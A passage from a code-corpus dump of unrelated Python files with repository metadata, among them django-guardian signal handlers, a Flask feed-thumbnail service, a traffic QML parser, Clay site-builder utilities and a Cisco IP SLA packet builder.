while iBranch[iDepth] > c[iDepth]-1: # If end of branches at this depth,
iDepth -= 1 # go up until we can go down again
iBranch[iDepth+1] = -1
if iDepth < 0:
break # All done with the tree
iBranch[iDepth] += 1
if iDepth < 0: break
print ic, [iDepth, iBranch]
ic = ic + 1
|
UTF-8
|
Python
| false | false | 2,014 |
8,280,696,993,218 |
d446cffc1f7bbc2f5937838882f8aa958ca83928
|
1ca18b8f7946ebbbccb6d0756994e7078e6a7d04
|
/guardian/management/__init__.py
|
03b7d8f47c07d2e201e0d571d70accfd4d81fd5b
|
[
"BSD-2-Clause"
] |
permissive
|
naro/django-guardian
|
https://github.com/naro/django-guardian
|
be60d242b80f499228338d76b7edea492e2b4c53
|
e8e2dd28d33f7662e4e94070aa47a665c9cdad0b
|
refs/heads/master
| 2021-01-20T19:19:11.847145 | 2012-08-24T16:27:47 | 2012-08-24T16:27:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.db.models import signals
from django.contrib.auth.models import User, Group
from guardian import models as guardian_app
from guardian.conf import settings as guardian_settings
def create_anonymous_user(sender, **kwargs):
"""
Creates anonymous User instance with id from settings.
"""
try:
User.objects.get(pk=guardian_settings.ANONYMOUS_USER_ID)
except User.DoesNotExist:
User.objects.create(pk=guardian_settings.ANONYMOUS_USER_ID,
username='AnonymousUser')
def create_authenticated_virtual_group(sender, **kwargs):
"""
Creates group which acts as virtual group for all authenticated members
"""
try:
Group.objects.get(pk=guardian_settings.AUTHENTICATED_VIRTUAL_GROUP_ID)
except Group.DoesNotExist:
Group.objects.create(pk=guardian_settings.AUTHENTICATED_VIRTUAL_GROUP_ID,
name=guardian_settings.AUTHENTICATED_VIRTUAL_GROUP_NAME)
signals.post_syncdb.connect(create_anonymous_user, sender=guardian_app,
dispatch_uid="guardian.management.create_anonymous_user")
signals.post_syncdb.connect(create_authenticated_virtual_group, sender=guardian_app,
dispatch_uid="guardian.management.create_authenticated_virtual_group")
|
UTF-8
|
Python
| false | false | 2,012 |
858,993,471,264 |
e910010925c82490e8a155294982aa7a6bae6fd0
|
ca4fef8f87456f4357a7a16dddf820bd8d3a5958
|
/settings.py
|
4527e9bab74335f7f30114b87620d71201117647
|
[] |
no_license
|
hughdbrown/fivesongsdaily
|
https://github.com/hughdbrown/fivesongsdaily
|
6e976b154ac2ef4257f2d1dd5fff276d0063fbf3
|
6facc7e932ecfb1e256ed886930ae7d901274fab
|
refs/heads/master
| 2021-01-18T19:10:09.208807 | 2009-06-30T19:30:42 | 2009-06-30T19:30:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os.path, logging, sys
# Django settings for the fivesongs project.
try:
from local_settings import *
except ImportError:
try:
from mod_python import apache
apache.log_error( "local_settings.py not set; using default settings", apache.APLOG_NOTICE )
except ImportError:
import sys
sys.stderr.write( "local_settings.py not set; using default settings\n" )
ADMINS = (
('', ''),
)
ADMIN_EMAIL = ''
MANAGERS = ADMINS
DEFAULT_FROM_EMAIL = ''
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
TIME_ZONE = 'America/Los Angeles'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
import django
DJANGO_ROOT = django.__path__[0]
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'site_media/')
MEDIA_URL = '/site_media/'
ADMIN_MEDIA_PREFIX = '/media/'
SECRET_KEY = ''
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
ROOT_URLCONF = 'fivesongsdaily.urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'templates/'),
os.path.join(DJANGO_ROOT, 'contrib/admin/templates/')
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.comments',
'fivesongsdaily.playlist',
'fivesongsdaily.profiles',
'fivesongsdaily.pages',
'fivesongsdaily.contact',
'fivesongsdaily.message',
'fivesongsdaily.test',
)
|
UTF-8
|
Python
| false | false | 2,009 |
18,064,632,453,480 |
7fbde9074a4f894b04a9d87c472278110d6c41cf
|
43dd0a32d566ec9d715e041366af487fb3f6ba3b
|
/fflow.py
|
3b9196a8bd8844062d692ee3960fe2d95c16430b
|
[] |
no_license
|
haron/fflow.net
|
https://github.com/haron/fflow.net
|
7435d262527405ee9829d635508ea317bf045808
|
b5cab4c433b15c15ba5443f74d026f3b73176ca4
|
refs/heads/master
| 2020-06-05T13:07:20.531897 | 2013-06-17T22:56:40 | 2013-06-17T22:56:40 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import requests
from flask import Flask, request, render_template
from BeautifulSoup import BeautifulSoup
from PIL import Image
from StringIO import StringIO
app = Flask(__name__)
app.debug = True
log = app.logger
FEED_PROXY = 'http://ajax.googleapis.com/ajax/services/feed/load'
MAX_ITEMS = 10
TN_WIDTH = 500
TN_HEIGHT = 170
slug_pattern = re.compile(r'[^\w\d\-/]+')
youtube_pat = re.compile(r'.*youtube.com/v/([\w\d_-]+).*')
vimeo_pat = re.compile(r'.*vimeo\.com/moogaloop\.swf\?clip_id=(\d+).*')
@app.route('/feed/')
def feed():
feed_url = request.args.get('url', None)
feed = process(feed_url)
return (render_template("feed.xml", **feed), 200, {"Content-Type": "text/xml; charset=utf-8"})
def fetch_json(url, params):
return requests.get(url, params=params).json()
def process(url):
params = {
'v': '1.0',
'q': url,
'num': MAX_ITEMS,
}
resp = requests.get(FEED_PROXY, params=params).json()
feed = resp['responseData']['feed']
feed['items'] = []
for entry in feed['entries']:
entry = Item(**entry)
feed['items'].append(entry)
return feed
class Item(object):
thumbnail = None
def __init__(self, *args, **kwargs):
if not 'guid' in kwargs:
kwargs['guid'] = kwargs['link']
for k in kwargs:
self.__dict__[k] = kwargs[k]
self.process()
def __str__(self):
return '<Item: %s>' % self.link
def process(self):
log.info('Processing %s' % self)
self.html = BeautifulSoup(self.content)
media_tn = None
images = self.html.findAll('img')
for i in images:
log.debug(i)
width, height = Image.open(StringIO(requests.get(i["src"]).content)).size
if width >=50 and height >= 50:
tn_width, tn_height = tn_size(width, height)
self.thumbnail = {
"url": i["src"],
"get_url": i["src"],
"width": tn_width,
"height": tn_height
}
break
return
def tn_size(width, height):
if float(width) / TN_WIDTH > float(height) / TN_HEIGHT:
ratio = float(TN_WIDTH) / width
else:
ratio = float(TN_HEIGHT) / height
width = int(width * ratio)
height = int(height * ratio)
return width, height
def main():
app.run(host="0.0.0.0")
if __name__ == '__main__':
main()
|
UTF-8
|
Python
| false | false | 2,013 |
9,723,805,960,767 |
b9342c9309db0e611bc375d69273f9bc4c2020c0
|
09cffe0141419e9fadabda41b69c828181db4bca
|
/scratch/TF2_QML_parser_v3_tmconly.py
|
39c8cecf4d9dd0b44be2459733b0fcf1157fd1b8
|
[] |
no_license
|
rymcd/traffic-sim
|
https://github.com/rymcd/traffic-sim
|
992bc24401662fda4a397971310e4e1e95985093
|
5b6b985c3f1ce8fe1c985c939ed13889bd47cdcc
|
refs/heads/master
| 2018-12-28T18:02:36.744405 | 2014-05-25T18:43:28 | 2014-05-25T18:43:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import sys, os, subprocess
from xml.etree import ElementTree
import csv
from Tkinter import Tk
from tkFileDialog import askopenfilename
def parse_function(filepart):
tree = ElementTree.fromstring(filepart)
linear = tree.getiterator('linear')
for eachlinear in linear:
PARSED_DATE_GMT = eachlinear.get('timestamp')
Linear_ID = eachlinear.get('id')
pointTmc = eachlinear.getchildren()
for each in pointTmc:
countsources = 0
dataTypescount = 0
Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,jamFactor,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,providerId,pathStart,pathEnd, sourceID, percentTravelled, pathTT,fullpathSpeed, pathspeed,startLat,startLong,endLat,endLong = '','','','','','','','','','','','','','','','','','','','','','','','','','','','','','',''
Point = each.get('pointTmcId')
freeflowSpeed = each.get('freeflowSpeed')
uncappedSpeed = each.get('uncappedSpeed')
cappedSpeed = each.get('cappedSpeed')
travelTimeConfidence = each.get('confidence')
jamFactor = each.get('jamFactor')
#dataType = each.getiterator('aggregation')
dataType = each.getchildren()
hires = 'N'
for each1 in dataType:
#print each1.tag
if each1.tag == 'aggregation':
#print 'dataType: ',each1, each1.tag
dataTypescount = dataTypescount + 1
SourceDataType = each1.get('type')
realtimePercent = each1.get('realtimePercent')
historicalPercent = each1.get('historicalPercent')
previousPercent = each1.get('previousPercent')
currentRealtimePercent = each1.get('currentRealtimePercent')
currentHistoricalPercent = each1.get('currentHistoricalPercent')
TMCAggTimestamp = each1.get('timestamp')
TMCAggTT = each1.get('travelTime')
speedSource = each1.getchildren()
for each2 in speedSource:
#print each2
if each2.tag == 'trafficPatterns':
NTP_StdDev = each2.get('stdDev')
NTP_Speed = each2.get('speed')
if each2.tag == 'previousAggregation':
PREV_realtimePercent = each2.get('realtimePercent')
PREV_historicalPercent = each2.get('historicalPercent')
PREV_previousPercent = each2.get('previousPercent')
PREV_currentRealtimePercent = each2.get('currentRealtimePercent')
PREV_currentHistoricalPercent = each2.get('currentHistoricalPercent')
PREV_TMCAggTimestamp = each2.get('timestamp')
PREV_TMCAggTT = each2.get('travelTime')
if each2.tag == 'probePath':
countsources = countsources + 1
providerId = each2.get('providerId')
pathStart = each2.get('pathStart')
pathEnd = each2.get('pathEnd')
sourceID = each2.get('sourceId')
percentTravelled = each2.get('percentTravelled')
pathTT = each2.get('travelTime')
fullpathSpeed = each2.get('pathSpeed')
pathSpeed = each2.get('ttaSpeed')
startLat = each2.get('startLat')
startLong = each2.get('startLong')
endLat = each2.get('endLat')
endLong = each2.get('endLong')
row_detail = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,each2.tag,providerId,pathStart,pathEnd, sourceID, percentTravelled, pathTT,fullpathSpeed, pathSpeed, startLat,startLong,endLat,endLong]
#print row_detail
row_detail = [x if x else '' for x in row_detail]
print >> f2, ",".join(row_detail)
if each2.tag == 'probe':
countsources = countsources + 1
providerId = each2.get('providerId')
pathStart = each2.get('pathStart')
pathEnd = each2.get('pathStart')
sourceID = each2.get('sourceId')
percentTravelled = each2.get('percentTravelled')
pathTT = each2.get('travelTime')
fullpathSpeed = each2.get('speed')
pathSpeed = each2.get('ttaSpeed')
startLat = each2.get('lat')
startLong = each2.get('long')
endLat = ''
endLong = ''
row_detail = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,each2.tag,providerId,pathStart,pathEnd, sourceID, percentTravelled, pathTT,fullpathSpeed, pathSpeed, startLat,startLong,endLat,endLong]
#print row_detail
row_detail = [x if x else '' for x in row_detail]
print >> f2, ",".join(row_detail)
##row_basic = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,'','','','','','','','','','','','','','','','','','','','','','','']
if countsources == 0 and dataTypescount > 0:
row_tmcagg = [PARSED_DATE_GMT,Point,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,'','','','','','','','','','','','','']
print >> f2, ",".join(row_tmcagg)
##if countsources == 0 and dataTypescount == 0:
##print >> f2, ",".join(row_basic)
currentdir = os.getcwd()
Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
filename = askopenfilename(title='Select the input QML file') # show an "Open" dialog box and return the path to the selected file
output_filename = (filename.rpartition('/')[2]).rpartition('.')[0]
f2 = open(str(currentdir+'\\output_'+output_filename+'_TMConly.csv'),'w+')
tree_string = '<root>'
x = 0
printvar = 0
print >> f2, 'PARSED_DATE_GMT,TMC,uncappedSpeed,cappedSpeed,travelTimeConfidence,freeflowSpeed,SourceDataType,realtimePercent,historicalPercent,previousPercent,currentRealtimePercent,currentHistoricalPercent,TMCAggTimestamp,TMCAggTT,NTP_StdDev,NTP_Speed,PREV_TMCAggTimestamp,PREV_TMCAggTT,PREV_currentRealtimePercent,dataType,providerId,pathStart,pathEnd,sourceID,percentTravelled,pathTT,fullpathSpeed,pathSpeed,startLat,startLong,endLat,endLong'
with open(str(filename)) as fileobject:
printvar = 0
for line in fileobject:
if line[:14] == '<?xml version=':
line = line.rpartition('<linears>')[2]
if line[:7] == '<linear':
tree_string = '<root>'
printvar = 1
if printvar == 0:
continue
if printvar == 1:
tree_string = tree_string + line
if (line == '</linear>\n' or line == '</linear>') and printvar == 1:
printvar = 0
tree_string = tree_string + '</root>'
#print tree_string
parse_function(tree_string)
x = x + 1
if x % 100000 == 0:
print str(x) + ' linears processed'
f2.close()
print 'Output created at : ' + str(currentdir+'\\output_'+output_filename+'_TMConly.csv')
print 'Total linears parsed: ', str(x)
|
UTF-8
|
Python
| false | false | 2,014 |
3,693,671,890,664 |
730af1c0c02cbb17d423e1aa6ec526b8986b1841
|
6f8f186a8eb4bfb42f98d3bc910817f817598eeb
|
/Garble/WxGuiTest.py
|
da702178feb6c904a485272451c8683e854f5484
|
[] |
no_license
|
Feni/GarbleNotes
|
https://github.com/Feni/GarbleNotes
|
5100cee273787bad3ce9a1d66fde813b43c8e7fe
|
e891b57f7cf8e2b325e68d098b26c0dd6951975b
|
refs/heads/master
| 2016-09-05T18:24:56.828664 | 2012-11-08T05:06:57 | 2012-11-08T05:06:57 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import wx
class MyFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, None, title="Garble", size=(500,150))
self.textfield = wx.TextCtrl(self, style=wx.TE_MULTILINE)
self.Bind(wx.EVT_CLOSE, self.OnExit) # Allows us to autosave on close.
self.Show(True)
def OnExit(self,event):
print "You wrote: "+self.textfield.GetValue()
self.Destroy()
app = wx.App(False)
frame = MyFrame()
app.MainLoop()
|
UTF-8
|
Python
| false | false | 2,012 |
19,430,432,070,512 |
a92a99cbc5b910b46365c189abb97608c9815215
|
54455d89dbd40966ce2c137b857759fa97981e55
|
/t1.py
|
ce6ccb603f430ad8b50864adc27b6e204310f2d9
|
[] |
no_license
|
altarim992/Peak
|
https://github.com/altarim992/Peak
|
94c99f382c0726fa1a69cc52ebdc09216f8e875d
|
6abd875d5f9028e7121cbc086acf499cb6764fe1
|
refs/heads/master
| 2021-01-18T09:46:07.329104 | 2012-05-05T04:43:38 | 2012-05-05T04:43:38 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
import pickle
import player
from player import *
import weapons
from weapons import *
import combat
from combat import *
import enemies
from enemies import *
class Post(object):
def __init__(self,name,physical,mental):
self.name = name
self.physical = physical
self.mental = mental
te = Post("Pole", 33, 1)
"""
class Dog(object):
def __init__(self,physical,mental,dmg,acc):
self.physical = physical
self.mental = mental
self.dmg = dmg
self.acc = acc
def statusUpdate():
print "Wolf Status:"
print "Physical: ",self.physical
print "Mental: ",self.mental
def death():
if beastHP < 1:
alive = False
Wolf = Dog(8,1,3,95)
"""
def statDump():
print PC.name
print "Physical: ",PC.physical
print "Mental: ",PC.mental
"""
def checkWin():
global battle
if Wolf.physical < 1:
battle = False
print "you killed the wolf!"
if PC.physical < 1:
battle = False
print "you died!"
"""
# loadChar = open('save/pc/matt.creature', 'r+')
# PC = pickle.load(loadChar)
menu = """
+--------------+
|$ | COMMANDS |
+--------------+
|e | LOAD ENEMY
|f | FIGHT
|q | QUIT
"""
battle = True
bcount = 0
while battle == True:
act = raw_input("Your turn> ")
if act.lower() in ['f']:
fight()
# hack()
# print te.tgt
elif act.lower() in ['q']:
battle = False
# print bcount
elif act.lower() in ['e']:
enemyLoad(neighbor1)
else:
print menu
# bcount +=1
"""
while battle == True:
# iTell()
statDump()
if turn/2 == turn / 2.0:
print menu
act = raw_input("what do you do? ")
if act.lower() in ['inventory']:
print "You have a splitter and an axe,"
print "And you currently have",itemOut,"equipped."
iact = raw_input("Would you like to switch(Y/n) ")
if iact.lower() in ['y']:
switch()
else:
print "ok, but you still lost a turn"
turn += 1
elif act.lower() in ['axe','attack','hit','fight']:
if weaponID.lower in ['axe']:
attack()
else:
rifle()
checkWin()
turn += 1
else:
print "invalid"
else:
wAtk = random.randint(0,100)
missB2 = Wolf.acc
if wAtk <= missB2:
PC.physical -= Wolf.dmg
print "the wolf strikes!"
print "the wolf did",Wolf.dmg,"damage"
else:
print "the wolf missed!"
checkWin()
turn += 1
"""
|
UTF-8
|
Python
| false | false | 2,012 |
19,104,014,573,567 |
dae653d6be7a05b7720521e1469be44ef189cf3a
|
17e11ad753d342eaed4f4e265583284e69386edb
|
/clay/utils.py
|
e956c53758d431a3e7db294b4cc5bde0b26d325b
|
[
"MIT"
] |
permissive
|
plaes/Clay
|
https://github.com/plaes/Clay
|
37397578c9b5181c817302fe809a1307753e2e50
|
ce33d7b273dd743f1f86356862d55abde8b2eb92
|
refs/heads/master
| 2020-02-03T04:56:13.084586 | 2012-08-14T01:26:19 | 2012-08-14T01:26:19 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
"""
# Clay.utils
"""
from datetime import datetime, date, time
from decimal import Decimal
import errno
import io
import math
import os
import re
import shutil
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
pass
import types
def is_binary(filepath):
"""Return True if the given filename is binary.
"""
CHUNKSIZE = 1024
with io.open(filepath, 'rb') as f:
while 1:
chunk = f.read(CHUNKSIZE)
if '\0' in chunk: # found null byte
return True
if len(chunk) < CHUNKSIZE:
break
return False
def walk_dir(path, callback, ignore=None):
ignore = ignore or ()
for folder, subs, files in os.walk(path):
ffolder = os.path.relpath(folder, path)
for filename in files:
if filename.startswith(ignore):
continue
relpath = os.path.join(ffolder, filename) \
.lstrip('.').lstrip('/').lstrip('\\')
callback(relpath)
def make_dirs(*lpath):
path = to_unicode(os.path.join(*lpath))
try:
os.makedirs(os.path.dirname(path))
except (OSError), e:
if e.errno != errno.EEXIST:
raise
return path
def get_source(filepath):
source = ''
with io.open(filepath, encoding='utf-8') as f:
source = f.read()
return source
def make_file(filepath, content):
if not isinstance(content, unicode):
content = unicode(content, 'utf-8')
with io.open(filepath, 'w+t', encoding='utf-8') as f:
f.write(content)
def remove_file(filepath):
try:
os.remove(filepath)
except OSError:
pass
def absolute_to_relative(content, relpath, theme_prefix=''):
# ## Normalize the relative-by-default URLs to absolute
# ## Eg: "foo.html" => "/foo.html"
# rx_rel_url = r' (src|href)=[\'"]([a-zA-Z0-9_]+[^\'"\:]+)[\'"]'
# abs_url = r' \1="/\2"'
# content = re.sub(rx_rel_url, abs_url, content)
## Relativize all absolute URLs
## Eg: "/en/bar.html" => "en/bar.html", and "/" => "index.html"
depth = relpath.count('/')
repl = '../' * depth
rel_url = r' \1="%s\2"' % repl
if theme_prefix:
theme_prefix = theme_prefix.strip('/').replace(r'/', r'\/') + r'\/+'
rx_abs_url = r' (src|href)=[\'"]\/+(?:%s)?([^\'"]+)[\'"]' % theme_prefix
else:
rx_abs_url = r' (src|href)=[\'"]\/+([^\'"]+)[\'"]'
content = re.sub(rx_abs_url, rel_url, content)
rx_abs_url = r' (src|href)=[\'"]\/[\'"]'
rel_url = r' \1="%sindex.html"' % repl
content = re.sub(rx_abs_url, rel_url, content)
return content
def get_processed_regex(processed_files):
rx_processed = [[
re.compile(r' (?P<attr>src|href)=[\'"](?P<path>.*)%s(?P<args>(\?.*)?(\#.*)?)?[\'"]' % (old,)),
r' \g<attr>="\g<path>%s\g<args>"' % (new,)
] for old, new in processed_files]
return rx_processed
def replace_processed_names(content, rx_processed):
for rxold, rxnew in rx_processed:
content = re.sub(rxold, rxnew, content)
return content
def get_file_mdate(filepath):
mtime = os.path.getmtime(filepath)
mdate = datetime.utcfromtimestamp(mtime)
mdate -= datetime.utcnow() - datetime.now()
return mdate
def copy_if_has_change(path_in, path_out):
if os.path.exists(path_out):
oldt = os.path.getmtime(path_out)
newt = os.path.getmtime(path_in)
if oldt == newt:
return
shutil.copy2(path_in, path_out)
def _is_protected_type(obj):
"""Determine if the object instance is of a protected type.
Objects of protected types are preserved as-is when passed to
to_unicode(strings_only=True).
"""
return isinstance(obj, (
types.NoneType,
int, long,
datetime, date, time,
float, Decimal)
)
def to_unicode(s, encoding='utf-8', strings_only=False, errors='strict'):
"""Returns a unicode object representing 's'. Treats bytestrings using the
`encoding` codec.
If strings_only is True, don't convert (some) non-string-like objects.
--------------------------------
Copied almost unchanged from Django <https://www.djangoproject.com/>
Copyright © 2005-2011 Django Software Foundation.
Used under the modified BSD license.
"""
# Handle the common case first, saves 30-40% in performance when s
# is an instance of unicode.
if isinstance(s, unicode):
return s
if strings_only and _is_protected_type(s):
return s
encoding = encoding or 'utf-8'
try:
if not isinstance(s, basestring):
if hasattr(s, '__unicode__'):
s = unicode(s)
else:
try:
s = unicode(str(s), encoding, errors)
except UnicodeEncodeError:
if not isinstance(s, Exception):
raise
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII data without special
# handling to display as a string. We need to handle this
# without raising a further exception. We do an
# approximation to what the Exception's standard str()
# output should be.
s = u' '.join([to_unicode(arg, encoding, strings_only,
errors) for arg in s])
elif not isinstance(s, unicode):
# Note: We use .decode() here, instead of unicode(s, encoding,
# errors), so that if s is a SafeString, it ends up being a
# SafeUnicode at the end.
s = s.decode(encoding, errors)
except UnicodeDecodeError, e:
if not isinstance(s, Exception):
raise UnicodeDecodeError(s, *e.args)
else:
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII bytestring data without a
# working unicode method. Try to handle this without raising a
# further exception by individually forcing the exception args
# to unicode.
s = u' '.join([to_unicode(arg, encoding, strings_only,
errors) for arg in s])
return s
def to_bytestring(s, encoding='utf-8', strings_only=False, errors='strict'):
"""Returns a bytestring version of 's', encoded as specified in 'encoding'.
If strings_only is True, don't convert (some) non-string-like objects.
--------------------------------
Copied almost unchanged from Django <https://www.djangoproject.com/>
Copyright © Django Software Foundation and individual contributors.
Used under the modified BSD license.
"""
if strings_only and isinstance(s, (types.NoneType, int)):
return s
encoding = encoding or 'utf-8'
if not isinstance(s, basestring):
try:
return str(s)
except UnicodeEncodeError:
if isinstance(s, Exception):
# An Exception subclass containing non-ASCII data that doesn't
# know how to print itself properly. We shouldn't raise a
# further exception.
return ' '.join([to_bytestring(arg, encoding, strings_only,
errors) for arg in s])
return unicode(s).encode(encoding, errors)
elif isinstance(s, unicode):
return s.encode(encoding, errors)
elif s and encoding != 'utf-8':
return s.decode('utf-8', errors).encode(encoding, errors)
else:
return s
def filter_to_json(source_dict):
return json.dumps(source_dict)
|
UTF-8
|
Python
| false | false | 2,012 |
5,609,227,297,854 |
3822537decb76553db84174ddeae11b2e1e742cf
|
1606fd006175c12254b30cd95a753586c5c9adb6
|
/landingpage/urls.py
|
d2868d298b820e537bb31d47b079ed7d5ebac6ef
|
[
"GPL-2.0-only"
] |
non_permissive
|
foutoucour/dogallowed
|
https://github.com/foutoucour/dogallowed
|
1a5c9288d060cba1705ace2f7b552deebc5b9a1a
|
ca195e287dc39a6461871e7114170861befe64cd
|
refs/heads/master
| 2016-08-03T13:26:15.596745 | 2014-06-18T12:43:58 | 2014-06-18T12:43:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.conf.urls import patterns, url
urlpatterns = patterns(
'landingpage',
url(r'^$', 'landingpage.views.landingpage', name='landingpage'),
)
|
UTF-8
|
Python
| false | false | 2,014 |
6,330,781,815,536 |
cf5fed4c0d49676b0f084f9fb65ccb0a99eb563e
|
365823983efc8afd9770d53e3dd132436af388e1
|
/utils.py
|
1c8a02dd3d7b40199c29de79a408f833f1d5b1e8
|
[] |
no_license
|
panchicore/backgrounds
|
https://github.com/panchicore/backgrounds
|
d30bb071cfa64f87443291a330b86eff980bbb4a
|
818c7a69d14f0699db021a5121a9366e6e1909bd
|
refs/heads/master
| 2021-01-19T06:19:31.175966 | 2011-10-13T00:19:49 | 2011-10-13T00:19:49 | 1,385,090 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
import urllib
import urllib2
import simplejson
from django.conf import settings
__author__ = 'panchicore'
def get_json(url):
req = urllib2.Request(url)
opener = urllib2.build_opener()
f = opener.open(req)
json = simplejson.load(f)
return json
def download_image(url, id, name):
image = urllib.URLopener()
download_path = os.path.join(settings.DOWNLOAD_IMAGE_PATH, str(id))
if not os.path.exists(download_path):
os.makedirs(download_path)
image.retrieve(url, os.path.join(download_path, name) )
|
UTF-8
|
Python
| false | false | 2,011 |
4,105,988,753,835 |
2e3261e828065b4a37a3cb368047317c2106ebe3
|
cb4abb9f1d74881cffa7ecbdcc755973614edb96
|
/main/environ.py
|
07a21fc188c5e2c071c2b77b15e138e689174304
|
[] |
no_license
|
tpenha/BaixeAssista
|
https://github.com/tpenha/BaixeAssista
|
89edf2898c6a5d81452623b80d45e3cc5fcccfb3
|
5228ecd4121dd08b9b51fef8f4ad49dd9c3ffa49
|
refs/heads/master
| 2019-04-27T19:39:28.692221 | 2013-01-19T21:39:30 | 2013-01-19T21:39:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import os, sys
def setup(skip = False):
""" configura o ambiente para a execução de um script separado """
if not skip:
os.environ['DJANGO_SETTINGS_MODULE'] = "main.settings"
SCRIPT_PATH = os.path.dirname( os.path.abspath(__file__) )
MAIN_DIR = os.path.dirname( SCRIPT_PATH )
if not MAIN_DIR in sys.path: sys.path.append(MAIN_DIR)
os.chdir( MAIN_DIR )
|
UTF-8
|
Python
| false | false | 2,013 |
13,082,470,387,517 |
e6c5e088fa00b813a6172b02b0221c0ef579b0fe
|
f0345463a035dcb6babf921d8049a020a416f06e
|
/ipsla.py
|
553ef5c4f77af48d0edca79ca993fbd3920b167c
|
[] |
no_license
|
zhutong/misc
|
https://github.com/zhutong/misc
|
b66be63734cbc7ff464ca51d8def153319d004e1
|
d16425472987f028f7e7d4c6f7a4e8292c4ca29c
|
refs/heads/master
| 2021-01-22T13:13:28.730466 | 2014-03-20T16:42:04 | 2014-03-20T16:42:04 | 17,203,178 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'zhutong'
import struct
import time
def get_milliseconds():
return int(time.time()) * 1000 % 4294967296
def convert_string(string):
return ''.join([chr(eval('0x%s' % s)) for s in string.split(':')])
def pack_init_request(sn, dst_ip, udp_port, unknown):
paras = 1, sn, 52, 4, 16, dst_ip, udp_port, unknown, 1, 28
return struct.pack('!BBH4xHH4x4sHHHH24x', *paras)
def unpack_init_req(string):
return struct.unpack('!xB14x4sHH28x', string)
def pack_init_response(init_request):
return init_request[:3] + chr(24) + init_request[4:24]
def unpack_init_res(string):
return struct.unpack('!BBH4xHH4x4BHH', string)
def pack_jitter_request(sn):
paras = (2, 0, get_milliseconds(), 0, sn, 0, 0xabcdabcdabcdabcd, 0xabcdabcdabcdabcd)
return struct.pack('!HHIIHH2Q', *paras)
def unpack_jitter_req(string):
return struct.unpack('!HHIIHH2Q', string)
def unpack_jitter_request(string):
return struct.unpack('!HHIIHH2Q', string)
def pack_jitter_response(request):
p = unpack_jitter_req(request)
paras = (p[0], p[1], p[2], get_milliseconds(), p[4], p[4], p[6], p[7])
return struct.pack('!HHIIHH2Q', *paras)
def unpack_jitter_res(string):
return struct.unpack('!HHIIHH2Q', string)
pcap_init_req = '''
01:b8:00:34:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:b9:00:34:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:ba:00:34:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:64:00:34:00:00:00:00:00:04:00:10:00:00:00:00:c0:a8:dd:65:27:10:1b:58:00:01:00:1c:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
'''.strip().splitlines()
pcap_init_res = '''
01:b8:00:18:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58
01:b9:00:18:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58
